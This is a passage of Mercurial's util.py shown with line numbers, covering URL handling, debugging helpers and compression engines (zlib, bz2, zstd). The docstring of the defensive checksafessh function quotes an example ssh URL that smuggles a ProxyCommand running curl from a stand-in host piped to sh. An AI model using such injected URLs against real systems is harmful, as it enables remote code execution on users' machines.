2907 2909 s = self.path
2908 2910 if self.scheme == 'bundle':
2909 2911 s = 'bundle:' + s
2910 2912 if self.fragment:
2911 2913 s += '#' + self.fragment
2912 2914 return s
2913 2915
2914 2916 s = self.scheme + ':'
2915 2917 if self.user or self.passwd or self.host:
2916 2918 s += '//'
2917 2919 elif self.scheme and (not self.path or self.path.startswith('/')
2918 2920 or hasdriveletter(self.path)):
2919 2921 s += '//'
2920 2922 if hasdriveletter(self.path):
2921 2923 s += '/'
2922 2924 if self.user:
2923 2925 s += urlreq.quote(self.user, safe=self._safechars)
2924 2926 if self.passwd:
2925 2927 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2926 2928 if self.user or self.passwd:
2927 2929 s += '@'
2928 2930 if self.host:
2929 2931 if not (self.host.startswith('[') and self.host.endswith(']')):
2930 2932 s += urlreq.quote(self.host)
2931 2933 else:
2932 2934 s += self.host
2933 2935 if self.port:
2934 2936 s += ':' + urlreq.quote(self.port)
2935 2937 if self.host:
2936 2938 s += '/'
2937 2939 if self.path:
2938 2940 # TODO: similar to the query string, we should not unescape the
2939 2941 # path when we store it, the path might contain '%2f' = '/',
2940 2942 # which we should *not* escape.
2941 2943 s += urlreq.quote(self.path, safe=self._safepchars)
2942 2944 if self.query:
2943 2945 # we store the query in escaped form.
2944 2946 s += '?' + self.query
2945 2947 if self.fragment is not None:
2946 2948 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2947 2949 return s
2948 2950
2949 2951 __str__ = encoding.strmethod(__bytes__)
2950 2952
2951 2953 def authinfo(self):
2952 2954 user, passwd = self.user, self.passwd
2953 2955 try:
2954 2956 self.user, self.passwd = None, None
2955 2957 s = bytes(self)
2956 2958 finally:
2957 2959 self.user, self.passwd = user, passwd
2958 2960 if not self.user:
2959 2961 return (s, None)
2960 2962 # authinfo[1] is passed to urllib2 password manager, and its
2961 2963 # URIs must not contain credentials. The host is passed in the
2962 2964 # URIs list because Python < 2.4.3 uses only that to search for
2963 2965 # a password.
2964 2966 return (s, (None, (s, self.host),
2965 2967 self.user, self.passwd or ''))
2966 2968
2967 2969 def isabs(self):
2968 2970 if self.scheme and self.scheme != 'file':
2969 2971 return True # remote URL
2970 2972 if hasdriveletter(self.path):
2971 2973 return True # absolute for our purposes - can't be joined()
2972 2974 if self.path.startswith(br'\\'):
2973 2975 return True # Windows UNC path
2974 2976 if self.path.startswith('/'):
2975 2977 return True # POSIX-style
2976 2978 return False
2977 2979
2978 2980 def localpath(self):
2979 2981 if self.scheme == 'file' or self.scheme == 'bundle':
2980 2982 path = self.path or '/'
2981 2983 # For Windows, we need to promote hosts containing drive
2982 2984 # letters to paths with drive letters.
2983 2985 if hasdriveletter(self._hostport):
2984 2986 path = self._hostport + '/' + self.path
2985 2987 elif (self.host is not None and self.path
2986 2988 and not hasdriveletter(path)):
2987 2989 path = '/' + path
2988 2990 return path
2989 2991 return self._origpath
2990 2992
2991 2993 def islocal(self):
2992 2994 '''whether localpath will return something that posixfile can open'''
2993 2995 return (not self.scheme or self.scheme == 'file'
2994 2996 or self.scheme == 'bundle')
2995 2997
2996 2998 def hasscheme(path):
2997 2999 return bool(url(path).scheme)
2998 3000
2999 3001 def hasdriveletter(path):
3000 3002 return path and path[1:2] == ':' and path[0:1].isalpha()
3001 3003
3002 3004 def urllocalpath(path):
3003 3005 return url(path, parsequery=False, parsefragment=False).localpath()
3004 3006
3005 3007 def checksafessh(path):
3006 3008 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3007 3009
3008 3010 This is a sanity check for ssh urls. ssh will parse the first item as
3009 3011 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3010 3012 Let's prevent these potentially exploitable urls entirely and warn the
3011 3013 user.
3012 3014
3013 3015 Raises an error.Abort when the url is unsafe.
3014 3016 """
3015 3017 path = urlreq.unquote(path)
3016 3018 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3017 3019 raise error.Abort(_('potentially unsafe url: %r') %
3018 3020 (path,))
3019 3021
3020 3022 def hidepassword(u):
3021 3023 '''hide user credential in a url string'''
3022 3024 u = url(u)
3023 3025 if u.passwd:
3024 3026 u.passwd = '***'
3025 3027 return bytes(u)
3026 3028
3027 3029 def removeauth(u):
3028 3030 '''remove all authentication information from a url string'''
3029 3031 u = url(u)
3030 3032 u.user = u.passwd = None
3031 3033 return str(u)
3032 3034
3033 3035 timecount = unitcountfn(
3034 3036 (1, 1e3, _('%.0f s')),
3035 3037 (100, 1, _('%.1f s')),
3036 3038 (10, 1, _('%.2f s')),
3037 3039 (1, 1, _('%.3f s')),
3038 3040 (100, 0.001, _('%.1f ms')),
3039 3041 (10, 0.001, _('%.2f ms')),
3040 3042 (1, 0.001, _('%.3f ms')),
3041 3043 (100, 0.000001, _('%.1f us')),
3042 3044 (10, 0.000001, _('%.2f us')),
3043 3045 (1, 0.000001, _('%.3f us')),
3044 3046 (100, 0.000000001, _('%.1f ns')),
3045 3047 (10, 0.000000001, _('%.2f ns')),
3046 3048 (1, 0.000000001, _('%.3f ns')),
3047 3049 )
3048 3050
3049 3051 _timenesting = [0]
3050 3052
3051 3053 def timed(func):
3052 3054 '''Report the execution time of a function call to stderr.
3053 3055
3054 3056 During development, use as a decorator when you need to measure
3055 3057 the cost of a function, e.g. as follows:
3056 3058
3057 3059 @util.timed
3058 3060 def foo(a, b, c):
3059 3061 pass
3060 3062 '''
3061 3063
3062 3064 def wrapper(*args, **kwargs):
3063 3065 start = timer()
3064 3066 indent = 2
3065 3067 _timenesting[0] += indent
3066 3068 try:
3067 3069 return func(*args, **kwargs)
3068 3070 finally:
3069 3071 elapsed = timer() - start
3070 3072 _timenesting[0] -= indent
3071 3073 stderr.write('%s%s: %s\n' %
3072 3074 (' ' * _timenesting[0], func.__name__,
3073 3075 timecount(elapsed)))
3074 3076 return wrapper
3075 3077
3076 3078 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3077 3079 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3078 3080
3079 3081 def sizetoint(s):
3080 3082 '''Convert a space specifier to a byte count.
3081 3083
3082 3084 >>> sizetoint(b'30')
3083 3085 30
3084 3086 >>> sizetoint(b'2.2kb')
3085 3087 2252
3086 3088 >>> sizetoint(b'6M')
3087 3089 6291456
3088 3090 '''
3089 3091 t = s.strip().lower()
3090 3092 try:
3091 3093 for k, u in _sizeunits:
3092 3094 if t.endswith(k):
3093 3095 return int(float(t[:-len(k)]) * u)
3094 3096 return int(t)
3095 3097 except ValueError:
3096 3098 raise error.ParseError(_("couldn't parse size: %s") % s)
3097 3099
3098 3100 class hooks(object):
3099 3101 '''A collection of hook functions that can be used to extend a
3100 3102 function's behavior. Hooks are called in lexicographic order,
3101 3103 based on the names of their sources.'''
3102 3104
3103 3105 def __init__(self):
3104 3106 self._hooks = []
3105 3107
3106 3108 def add(self, source, hook):
3107 3109 self._hooks.append((source, hook))
3108 3110
3109 3111 def __call__(self, *args):
3110 3112 self._hooks.sort(key=lambda x: x[0])
3111 3113 results = []
3112 3114 for source, hook in self._hooks:
3113 3115 results.append(hook(*args))
3114 3116 return results
3115 3117
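# A minimal sketch ('ext1'/'ext2' are hypothetical source names); note
# that hooks run in lexicographic order of their sources, not in
# registration order:
#
#   >>> h = hooks()
#   >>> h.add(b'ext2', lambda x: x + 2)
#   >>> h.add(b'ext1', lambda x: x + 1)
#   >>> h(10)
#   [11, 12]
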
3116 3118 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3117 3119 '''Yields lines for a nicely formatted stacktrace.
3118 3120 Skips the 'skip' last entries, then returns the last 'depth' entries.
3119 3121 Each file+linenumber is formatted according to fileline.
3120 3122 Each line is formatted according to line.
3121 3123 If line is None, it yields:
3122 3124 length of longest filepath+line number,
3123 3125 filepath+linenumber,
3124 3126 function
3125 3127
3126 3128 Not to be used in production code, but very convenient while developing.
3127 3129 '''
3128 3130 entries = [(fileline % (fn, ln), func)
3129 3131 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3130 3132 ][-depth:]
3131 3133 if entries:
3132 3134 fnmax = max(len(entry[0]) for entry in entries)
3133 3135 for fnln, func in entries:
3134 3136 if line is None:
3135 3137 yield (fnmax, fnln, func)
3136 3138 else:
3137 3139 yield line % (fnmax, fnln, func)
3138 3140
3139 3141 def debugstacktrace(msg='stacktrace', skip=0,
3140 3142 f=stderr, otherf=stdout, depth=0):
3141 3143 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3142 3144 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3143 3145 By default it will flush stdout first.
3144 3146 It can be used everywhere and intentionally does not require a ui object.
3145 3147 Not to be used in production code, but very convenient while developing.
3146 3148 '''
3147 3149 if otherf:
3148 3150 otherf.flush()
3149 3151 f.write('%s at:\n' % msg.rstrip())
3150 3152 for line in getstackframes(skip + 1, depth=depth):
3151 3153 f.write(line)
3152 3154 f.flush()
3153 3155
3154 3156 class dirs(object):
3155 3157 '''a multiset of directory names from a dirstate or manifest'''
3156 3158
3157 3159 def __init__(self, map, skip=None):
3158 3160 self._dirs = {}
3159 3161 addpath = self.addpath
3160 3162 if safehasattr(map, 'iteritems') and skip is not None:
3161 3163 for f, s in map.iteritems():
3162 3164 if s[0] != skip:
3163 3165 addpath(f)
3164 3166 else:
3165 3167 for f in map:
3166 3168 addpath(f)
3167 3169
3168 3170 def addpath(self, path):
3169 3171 dirs = self._dirs
3170 3172 for base in finddirs(path):
3171 3173 if base in dirs:
3172 3174 dirs[base] += 1
3173 3175 return
3174 3176 dirs[base] = 1
3175 3177
3176 3178 def delpath(self, path):
3177 3179 dirs = self._dirs
3178 3180 for base in finddirs(path):
3179 3181 if dirs[base] > 1:
3180 3182 dirs[base] -= 1
3181 3183 return
3182 3184 del dirs[base]
3183 3185
3184 3186 def __iter__(self):
3185 3187 return iter(self._dirs)
3186 3188
3187 3189 def __contains__(self, d):
3188 3190 return d in self._dirs
3189 3191
3190 3192 if safehasattr(parsers, 'dirs'):
3191 3193 dirs = parsers.dirs
3192 3194
3193 3195 def finddirs(path):
3194 3196 pos = path.rfind('/')
3195 3197 while pos != -1:
3196 3198 yield path[:pos]
3197 3199 pos = path.rfind('/', 0, pos)
3198 3200
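# For example:
#
#   >>> list(finddirs(b'a/b/c'))
#   ['a/b', 'a']
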
3199 3201 # compression code
3200 3202
3201 3203 SERVERROLE = 'server'
3202 3204 CLIENTROLE = 'client'
3203 3205
3204 3206 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3205 3207 (u'name', u'serverpriority',
3206 3208 u'clientpriority'))
3207 3209
3208 3210 class compressormanager(object):
3209 3211 """Holds registrations of various compression engines.
3210 3212
3211 3213 This class essentially abstracts the differences between compression
3212 3214 engines to allow new compression formats to be added easily, possibly from
3213 3215 extensions.
3214 3216
3215 3217 Compressors are registered against the global instance by calling its
3216 3218 ``register()`` method.
3217 3219 """
3218 3220 def __init__(self):
3219 3221 self._engines = {}
3220 3222 # Bundle spec human name to engine name.
3221 3223 self._bundlenames = {}
3222 3224 # Internal bundle identifier to engine name.
3223 3225 self._bundletypes = {}
3224 3226 # Revlog header to engine name.
3225 3227 self._revlogheaders = {}
3226 3228 # Wire proto identifier to engine name.
3227 3229 self._wiretypes = {}
3228 3230
3229 3231 def __getitem__(self, key):
3230 3232 return self._engines[key]
3231 3233
3232 3234 def __contains__(self, key):
3233 3235 return key in self._engines
3234 3236
3235 3237 def __iter__(self):
3236 3238 return iter(self._engines.keys())
3237 3239
3238 3240 def register(self, engine):
3239 3241 """Register a compression engine with the manager.
3240 3242
3241 3243 The argument must be a ``compressionengine`` instance.
3242 3244 """
3243 3245 if not isinstance(engine, compressionengine):
3244 3246 raise ValueError(_('argument must be a compressionengine'))
3245 3247
3246 3248 name = engine.name()
3247 3249
3248 3250 if name in self._engines:
3249 3251 raise error.Abort(_('compression engine %s already registered') %
3250 3252 name)
3251 3253
3252 3254 bundleinfo = engine.bundletype()
3253 3255 if bundleinfo:
3254 3256 bundlename, bundletype = bundleinfo
3255 3257
3256 3258 if bundlename in self._bundlenames:
3257 3259 raise error.Abort(_('bundle name %s already registered') %
3258 3260 bundlename)
3259 3261 if bundletype in self._bundletypes:
3260 3262 raise error.Abort(_('bundle type %s already registered by %s') %
3261 3263 (bundletype, self._bundletypes[bundletype]))
3262 3264
3263 3265 # Only register the external-facing name if one was declared.
3264 3266 if bundlename:
3265 3267 self._bundlenames[bundlename] = name
3266 3268
3267 3269 self._bundletypes[bundletype] = name
3268 3270
3269 3271 wiresupport = engine.wireprotosupport()
3270 3272 if wiresupport:
3271 3273 wiretype = wiresupport.name
3272 3274 if wiretype in self._wiretypes:
3273 3275 raise error.Abort(_('wire protocol compression %s already '
3274 3276 'registered by %s') %
3275 3277 (wiretype, self._wiretypes[wiretype]))
3276 3278
3277 3279 self._wiretypes[wiretype] = name
3278 3280
3279 3281 revlogheader = engine.revlogheader()
3280 3282 if revlogheader and revlogheader in self._revlogheaders:
3281 3283 raise error.Abort(_('revlog header %s already registered by %s') %
3282 3284 (revlogheader, self._revlogheaders[revlogheader]))
3283 3285
3284 3286 if revlogheader:
3285 3287 self._revlogheaders[revlogheader] = name
3286 3288
3287 3289 self._engines[name] = engine
3288 3290
3289 3291 @property
3290 3292 def supportedbundlenames(self):
3291 3293 return set(self._bundlenames.keys())
3292 3294
3293 3295 @property
3294 3296 def supportedbundletypes(self):
3295 3297 return set(self._bundletypes.keys())
3296 3298
3297 3299 def forbundlename(self, bundlename):
3298 3300 """Obtain a compression engine registered to a bundle name.
3299 3301
3300 3302 Will raise KeyError if the bundle type isn't registered.
3301 3303
3302 3304 Will abort if the engine is known but not available.
3303 3305 """
3304 3306 engine = self._engines[self._bundlenames[bundlename]]
3305 3307 if not engine.available():
3306 3308 raise error.Abort(_('compression engine %s could not be loaded') %
3307 3309 engine.name())
3308 3310 return engine
3309 3311
3310 3312 def forbundletype(self, bundletype):
3311 3313 """Obtain a compression engine registered to a bundle type.
3312 3314
3313 3315 Will raise KeyError if the bundle type isn't registered.
3314 3316
3315 3317 Will abort if the engine is known but not available.
3316 3318 """
3317 3319 engine = self._engines[self._bundletypes[bundletype]]
3318 3320 if not engine.available():
3319 3321 raise error.Abort(_('compression engine %s could not be loaded') %
3320 3322 engine.name())
3321 3323 return engine
3322 3324
3323 3325 def supportedwireengines(self, role, onlyavailable=True):
3324 3326 """Obtain compression engines that support the wire protocol.
3325 3327
3326 3328 Returns a list of engines in prioritized order, most desired first.
3327 3329
3328 3330 If ``onlyavailable`` is set, filter out engines that can't be
3329 3331 loaded.
3330 3332 """
3331 3333 assert role in (SERVERROLE, CLIENTROLE)
3332 3334
3333 3335 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3334 3336
3335 3337 engines = [self._engines[e] for e in self._wiretypes.values()]
3336 3338 if onlyavailable:
3337 3339 engines = [e for e in engines if e.available()]
3338 3340
3339 3341 def getkey(e):
3340 3342 # Sort first by priority, highest first. In case of tie, sort
3341 3343 # alphabetically. This is arbitrary, but ensures output is
3342 3344 # stable.
3343 3345 w = e.wireprotosupport()
3344 3346 return -1 * getattr(w, attr), w.name
3345 3347
3346 3348 return sorted(engines, key=getkey)
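# Hedged illustration with the engines registered later in this module:
# for SERVERROLE, zstd (50) sorts before zlib (20), with bzip2 and none
# (both 0) last, their tie broken alphabetically.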
3347 3349
3348 3350 def forwiretype(self, wiretype):
3349 3351 engine = self._engines[self._wiretypes[wiretype]]
3350 3352 if not engine.available():
3351 3353 raise error.Abort(_('compression engine %s could not be loaded') %
3352 3354 engine.name())
3353 3355 return engine
3354 3356
3355 3357 def forrevlogheader(self, header):
3356 3358 """Obtain a compression engine registered to a revlog header.
3357 3359
3358 3360 Will raise KeyError if the revlog header value isn't registered.
3359 3361 """
3360 3362 return self._engines[self._revlogheaders[header]]
3361 3363
3362 3364 compengines = compressormanager()
3363 3365
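# A hedged sketch of how an extension might register an engine with the
# global manager (``_myengine`` is hypothetical):
#
#   class _myengine(compressionengine):
#       def name(self):
#           return 'myengine'
#
#   compengines.register(_myengine())
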
3364 3366 class compressionengine(object):
3365 3367 """Base class for compression engines.
3366 3368
3367 3369 Compression engines must implement the interface defined by this class.
3368 3370 """
3369 3371 def name(self):
3370 3372 """Returns the name of the compression engine.
3371 3373
3372 3374 This is the key the engine is registered under.
3373 3375
3374 3376 This method must be implemented.
3375 3377 """
3376 3378 raise NotImplementedError()
3377 3379
3378 3380 def available(self):
3379 3381 """Whether the compression engine is available.
3380 3382
3381 3383 The intent of this method is to allow optional compression engines
3382 3384 that may not be available in all installations (such as engines relying
3383 3385 on C extensions that may not be present).
3384 3386 """
3385 3387 return True
3386 3388
3387 3389 def bundletype(self):
3388 3390 """Describes bundle identifiers for this engine.
3389 3391
3390 3392 If this compression engine isn't supported for bundles, returns None.
3391 3393
3392 3394 If this engine can be used for bundles, returns a 2-tuple of strings of
3393 3395 the user-facing "bundle spec" compression name and an internal
3394 3396 identifier used to denote the compression format within bundles. To
3395 3397 exclude the name from external usage, set the first element to ``None``.
3396 3398
3397 3399 If bundle compression is supported, the class must also implement
3398 3400 ``compressstream`` and ``decompressorreader``.
3399 3401
3400 3402 The docstring of this method is used in the help system to tell users
3401 3403 about this engine.
3402 3404 """
3403 3405 return None
3404 3406
3405 3407 def wireprotosupport(self):
3406 3408 """Declare support for this compression format on the wire protocol.
3407 3409
3408 3410 If this compression engine isn't supported for compressing wire
3409 3411 protocol payloads, returns None.
3410 3412
3411 3413 Otherwise, returns ``compenginewireprotosupport`` with the following
3412 3414 fields:
3413 3415
3414 3416 * String format identifier
3415 3417 * Integer priority for the server
3416 3418 * Integer priority for the client
3417 3419
3418 3420 The integer priorities are used to order the advertisement of format
3419 3421 support by server and client. The highest integer is advertised
3420 3422 first. Integers with non-positive values aren't advertised.
3421 3423
3422 3424 The priority values are somewhat arbitrary and only used for default
3423 3425 ordering. The relative order can be changed via config options.
3424 3426
3425 3427 If wire protocol compression is supported, the class must also implement
3426 3428 ``compressstream`` and ``decompressorreader``.
3427 3429 """
3428 3430 return None
3429 3431
3430 3432 def revlogheader(self):
3431 3433 """Header added to revlog chunks that identifies this engine.
3432 3434
3433 3435 If this engine can be used to compress revlogs, this method should
3434 3436 return the bytes used to identify chunks compressed with this engine.
3435 3437 Else, the method should return ``None`` to indicate it does not
3436 3438 participate in revlog compression.
3437 3439 """
3438 3440 return None
3439 3441
3440 3442 def compressstream(self, it, opts=None):
3441 3443 """Compress an iterator of chunks.
3442 3444
3443 3445 The method receives an iterator (ideally a generator) of chunks of
3444 3446 bytes to be compressed. It returns an iterator (ideally a generator)
3445 3447 of bytes of chunks representing the compressed output.
3446 3448
3447 3449 Optionally accepts an argument defining how to perform compression.
3448 3450 Each engine treats this argument differently.
3449 3451 """
3450 3452 raise NotImplementedError()
3451 3453
3452 3454 def decompressorreader(self, fh):
3453 3455 """Perform decompression on a file object.
3454 3456
3455 3457 Argument is an object with a ``read(size)`` method that returns
3456 3458 compressed data. Return value is an object with a ``read(size)`` that
3457 3459 returns uncompressed data.
3458 3460 """
3459 3461 raise NotImplementedError()
3460 3462
3461 3463 def revlogcompressor(self, opts=None):
3462 3464 """Obtain an object that can be used to compress revlog entries.
3463 3465
3464 3466 The object has a ``compress(data)`` method that compresses binary
3465 3467 data. This method returns compressed binary data or ``None`` if
3466 3468 the data could not be compressed (too small, not compressible, etc).
3467 3469 The returned data should have a header uniquely identifying this
3468 3470 compression format so decompression can be routed to this engine.
3469 3471 This header should be identified by the ``revlogheader()`` return
3470 3472 value.
3471 3473
3472 3474 The object has a ``decompress(data)`` method that decompresses
3473 3475 data. The method will only be called if ``data`` begins with
3474 3476 ``revlogheader()``. The method should return the raw, uncompressed
3475 3477 data or raise a ``RevlogError``.
3476 3478
3477 3479 The object is reusable but is not thread safe.
3478 3480 """
3479 3481 raise NotImplementedError()
3480 3482
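# A hedged sketch of the revlogcompressor contract (``data`` illustrative):
#
#   c = compengines['zlib'].revlogcompressor()
#   comp = c.compress(data)       # None when compression is not a win
#   if comp is not None:
#       assert c.decompress(comp) == data
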
3481 3483 class _zlibengine(compressionengine):
3482 3484 def name(self):
3483 3485 return 'zlib'
3484 3486
3485 3487 def bundletype(self):
3486 3488 """zlib compression using the DEFLATE algorithm.
3487 3489
3488 3490 All Mercurial clients should support this format. The compression
3489 3491 algorithm strikes a reasonable balance between compression ratio
3490 3492 and size.
3491 3493 """
3492 3494 return 'gzip', 'GZ'
3493 3495
3494 3496 def wireprotosupport(self):
3495 3497 return compewireprotosupport('zlib', 20, 20)
3496 3498
3497 3499 def revlogheader(self):
3498 3500 return 'x'
3499 3501
3500 3502 def compressstream(self, it, opts=None):
3501 3503 opts = opts or {}
3502 3504
3503 3505 z = zlib.compressobj(opts.get('level', -1))
3504 3506 for chunk in it:
3505 3507 data = z.compress(chunk)
3506 3508 # Not all calls to compress emit data. It is cheaper to inspect
3507 3509 # here than to feed empty chunks through the generator.
3508 3510 if data:
3509 3511 yield data
3510 3512
3511 3513 yield z.flush()
3512 3514
3513 3515 def decompressorreader(self, fh):
3514 3516 def gen():
3515 3517 d = zlib.decompressobj()
3516 3518 for chunk in filechunkiter(fh):
3517 3519 while chunk:
3518 3520 # Limit output size to limit memory.
3519 3521 yield d.decompress(chunk, 2 ** 18)
3520 3522 chunk = d.unconsumed_tail
3521 3523
3522 3524 return chunkbuffer(gen())
3523 3525
3524 3526 class zlibrevlogcompressor(object):
3525 3527 def compress(self, data):
3526 3528 insize = len(data)
3527 3529 # Caller handles empty input case.
3528 3530 assert insize > 0
3529 3531
3530 3532 if insize < 44:
3531 3533 return None
3532 3534
3533 3535 elif insize <= 1000000:
3534 3536 compressed = zlib.compress(data)
3535 3537 if len(compressed) < insize:
3536 3538 return compressed
3537 3539 return None
3538 3540
3539 3541 # zlib makes an internal copy of the input buffer, doubling
3540 3542 # memory usage for large inputs. So do streaming compression
3541 3543 # on large inputs.
3542 3544 else:
3543 3545 z = zlib.compressobj()
3544 3546 parts = []
3545 3547 pos = 0
3546 3548 while pos < insize:
3547 3549 pos2 = pos + 2**20
3548 3550 parts.append(z.compress(data[pos:pos2]))
3549 3551 pos = pos2
3550 3552 parts.append(z.flush())
3551 3553
3552 3554 if sum(map(len, parts)) < insize:
3553 3555 return ''.join(parts)
3554 3556 return None
3555 3557
3556 3558 def decompress(self, data):
3557 3559 try:
3558 3560 return zlib.decompress(data)
3559 3561 except zlib.error as e:
3560 3562 raise error.RevlogError(_('revlog decompress error: %s') %
3561 3563 str(e))
3562 3564
3563 3565 def revlogcompressor(self, opts=None):
3564 3566 return self.zlibrevlogcompressor()
3565 3567
3566 3568 compengines.register(_zlibengine())
3567 3569
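# A hedged round-trip sketch with the zlib engine (payload illustrative):
#
#   eng = compengines['zlib']
#   blob = ''.join(eng.compressstream(iter(['some payload'])))
#   eng.decompressorreader(stringio(blob)).read(12)  # -> 'some payload'
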
3568 3570 class _bz2engine(compressionengine):
3569 3571 def name(self):
3570 3572 return 'bz2'
3571 3573
3572 3574 def bundletype(self):
3573 3575 """An algorithm that produces smaller bundles than ``gzip``.
3574 3576
3575 3577 All Mercurial clients should support this format.
3576 3578
3577 3579 This engine will likely produce smaller bundles than ``gzip`` but
3578 3580 will be significantly slower, both during compression and
3579 3581 decompression.
3580 3582
3581 3583 If available, the ``zstd`` engine can yield similar or better
3582 3584 compression at much higher speeds.
3583 3585 """
3584 3586 return 'bzip2', 'BZ'
3585 3587
3586 3588 # We declare a protocol name but don't advertise by default because
3587 3589 # it is slow.
3588 3590 def wireprotosupport(self):
3589 3591 return compewireprotosupport('bzip2', 0, 0)
3590 3592
3591 3593 def compressstream(self, it, opts=None):
3592 3594 opts = opts or {}
3593 3595 z = bz2.BZ2Compressor(opts.get('level', 9))
3594 3596 for chunk in it:
3595 3597 data = z.compress(chunk)
3596 3598 if data:
3597 3599 yield data
3598 3600
3599 3601 yield z.flush()
3600 3602
3601 3603 def decompressorreader(self, fh):
3602 3604 def gen():
3603 3605 d = bz2.BZ2Decompressor()
3604 3606 for chunk in filechunkiter(fh):
3605 3607 yield d.decompress(chunk)
3606 3608
3607 3609 return chunkbuffer(gen())
3608 3610
3609 3611 compengines.register(_bz2engine())
3610 3612
3611 3613 class _truncatedbz2engine(compressionengine):
3612 3614 def name(self):
3613 3615 return 'bz2truncated'
3614 3616
3615 3617 def bundletype(self):
3616 3618 return None, '_truncatedBZ'
3617 3619
3618 3620 # We don't implement compressstream because it is hackily handled elsewhere.
3619 3621
3620 3622 def decompressorreader(self, fh):
3621 3623 def gen():
3622 3624 # The input stream doesn't have the 'BZ' header. So add it back.
3623 3625 d = bz2.BZ2Decompressor()
3624 3626 d.decompress('BZ')
3625 3627 for chunk in filechunkiter(fh):
3626 3628 yield d.decompress(chunk)
3627 3629
3628 3630 return chunkbuffer(gen())
3629 3631
3630 3632 compengines.register(_truncatedbz2engine())
3631 3633
3632 3634 class _noopengine(compressionengine):
3633 3635 def name(self):
3634 3636 return 'none'
3635 3637
3636 3638 def bundletype(self):
3637 3639 """No compression is performed.
3638 3640
3639 3641 Use this compression engine to explicitly disable compression.
3640 3642 """
3641 3643 return 'none', 'UN'
3642 3644
3643 3645 # Clients always support uncompressed payloads. Servers don't advertise
3644 3646 # it by default because, unless you are on a fast network, uncompressed
3645 3647 # payloads can easily saturate your network pipe.
3646 3648 def wireprotosupport(self):
3647 3649 return compewireprotosupport('none', 0, 10)
3648 3650
3649 3651 # We don't implement revlogheader because it is handled specially
3650 3652 # in the revlog class.
3651 3653
3652 3654 def compressstream(self, it, opts=None):
3653 3655 return it
3654 3656
3655 3657 def decompressorreader(self, fh):
3656 3658 return fh
3657 3659
3658 3660 class nooprevlogcompressor(object):
3659 3661 def compress(self, data):
3660 3662 return None
3661 3663
3662 3664 def revlogcompressor(self, opts=None):
3663 3665 return self.nooprevlogcompressor()
3664 3666
3665 3667 compengines.register(_noopengine())
3666 3668
3667 3669 class _zstdengine(compressionengine):
3668 3670 def name(self):
3669 3671 return 'zstd'
3670 3672
3671 3673 @propertycache
3672 3674 def _module(self):
3673 3675 # Not all installs have the zstd module available. So defer importing
3674 3676 # until first access.
3675 3677 try:
3676 3678 from . import zstd
3677 3679 # Force delayed import.
3678 3680 zstd.__version__
3679 3681 return zstd
3680 3682 except ImportError:
3681 3683 return None
3682 3684
3683 3685 def available(self):
3684 3686 return bool(self._module)
3685 3687
3686 3688 def bundletype(self):
3687 3689 """A modern compression algorithm that is fast and highly flexible.
3688 3690
3689 3691 Only supported by Mercurial 4.1 and newer clients.
3690 3692
3691 3693 With the default settings, zstd compression is both faster and yields
3692 3694 better compression than ``gzip``. It also frequently yields better
3693 3695 compression than ``bzip2`` while operating at much higher speeds.
3694 3696
3695 3697 If this engine is available and backwards compatibility is not a
3696 3698 concern, it is likely the best available engine.
3697 3699 """
3698 3700 return 'zstd', 'ZS'
3699 3701
3700 3702 def wireprotosupport(self):
3701 3703 return compewireprotosupport('zstd', 50, 50)
3702 3704
3703 3705 def revlogheader(self):
3704 3706 return '\x28'
3705 3707
3706 3708 def compressstream(self, it, opts=None):
3707 3709 opts = opts or {}
3708 3710 # zstd level 3 is almost always significantly faster than zlib
3709 3711 # while providing no worse compression. It strikes a good balance
3710 3712 # between speed and compression.
3711 3713 level = opts.get('level', 3)
3712 3714
3713 3715 zstd = self._module
3714 3716 z = zstd.ZstdCompressor(level=level).compressobj()
3715 3717 for chunk in it:
3716 3718 data = z.compress(chunk)
3717 3719 if data:
3718 3720 yield data
3719 3721
3720 3722 yield z.flush()
3721 3723
3722 3724 def decompressorreader(self, fh):
3723 3725 zstd = self._module
3724 3726 dctx = zstd.ZstdDecompressor()
3725 3727 return chunkbuffer(dctx.read_from(fh))
3726 3728
3727 3729 class zstdrevlogcompressor(object):
3728 3730 def __init__(self, zstd, level=3):
3729 3731 # Writing the content size adds a few bytes to the output. However,
3730 3732 # it allows decompression to be more optimal since we can
3731 3733 # pre-allocate a buffer to hold the result.
3732 3734 self._cctx = zstd.ZstdCompressor(level=level,
3733 3735 write_content_size=True)
3734 3736 self._dctx = zstd.ZstdDecompressor()
3735 3737 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3736 3738 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3737 3739
3738 3740 def compress(self, data):
3739 3741 insize = len(data)
3740 3742 # Caller handles empty input case.
3741 3743 assert insize > 0
3742 3744
3743 3745 if insize < 50:
3744 3746 return None
3745 3747
3746 3748 elif insize <= 1000000:
3747 3749 compressed = self._cctx.compress(data)
3748 3750 if len(compressed) < insize:
3749 3751 return compressed
3750 3752 return None
3751 3753 else:
3752 3754 z = self._cctx.compressobj()
3753 3755 chunks = []
3754 3756 pos = 0
3755 3757 while pos < insize:
3756 3758 pos2 = pos + self._compinsize
3757 3759 chunk = z.compress(data[pos:pos2])
3758 3760 if chunk:
3759 3761 chunks.append(chunk)
3760 3762 pos = pos2
3761 3763 chunks.append(z.flush())
3762 3764
3763 3765 if sum(map(len, chunks)) < insize:
3764 3766 return ''.join(chunks)
3765 3767 return None
3766 3768
3767 3769 def decompress(self, data):
3768 3770 insize = len(data)
3769 3771
3770 3772 try:
3771 3773 # This was measured to be faster than other streaming
3772 3774 # decompressors.
3773 3775 dobj = self._dctx.decompressobj()
3774 3776 chunks = []
3775 3777 pos = 0
3776 3778 while pos < insize:
3777 3779 pos2 = pos + self._decompinsize
3778 3780 chunk = dobj.decompress(data[pos:pos2])
3779 3781 if chunk:
3780 3782 chunks.append(chunk)
3781 3783 pos = pos2
3782 3784 # Frame should be exhausted, so no finish() API.
3783 3785
3784 3786 return ''.join(chunks)
